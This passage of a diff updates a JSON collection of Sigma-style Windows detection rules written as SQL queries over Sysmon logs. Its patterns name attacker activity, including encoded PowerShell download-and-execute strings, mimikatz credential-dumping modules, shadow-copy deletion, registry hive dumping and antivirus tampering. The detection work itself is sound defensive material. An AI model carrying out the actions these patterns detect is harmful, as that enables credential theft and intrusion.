'%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "attack.resource_development", + "attack.t1588.002" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" - }, - { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' 
ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND 
CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" 
+ "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "status": "experimental", + "description": "Detects COM object hijacking via TreatAs subkey", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Maybe some system utilities in rare cases use linking keys for backward compatibility" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_add_persistence_com_key_linking.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects registry keys related to Ursnif malware.", + 
"author": "megan201296", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1112" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Suspicious Add Scheduled Task Parent", - "id": "9494479d-d994-40bf-a8b1-eea890237021", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate security products 
adding their own AMSI providers. Filter these according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_parent.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". 
This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "title": "Potential Persistence Via Disk Cleanup Handler - Registry", + "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ - "Command lines that use the same flags" + "Legitimate new entry added by windows" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" }, { - "title": "Exports Registry Key To a File", - "id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", - "status": "test", - "description": "Detects the export of the target Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + 
"title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "id": "480421f9-417f-4d3b-9552-fd2728443ec8", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate export of keys" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\')) AND ((CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((Details LIKE '(Empty)' ESCAPE '\\' OR Details LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_export_keys.yml" + "filename": 
"registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" }, { - "title": "Stop Windows Service Via PowerShell Stop-Service", - "id": "c49c5062-0966-4170-9efd-9968c913a6cf", - "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. 
Filter legitimate activity accordingly" + "Unknown" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND CommandLine LIKE '%Stop-Service %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_stop_service.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1562.001" ], + "falsepositives": [ + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' 
ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "Execute Code with Pester.bat", - "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "title": "Disable Administrative Share Creation at Startup", + "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "status": "test", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "Julia Fomina, oscd.community", + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1216" + "attack.t1070.005" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE 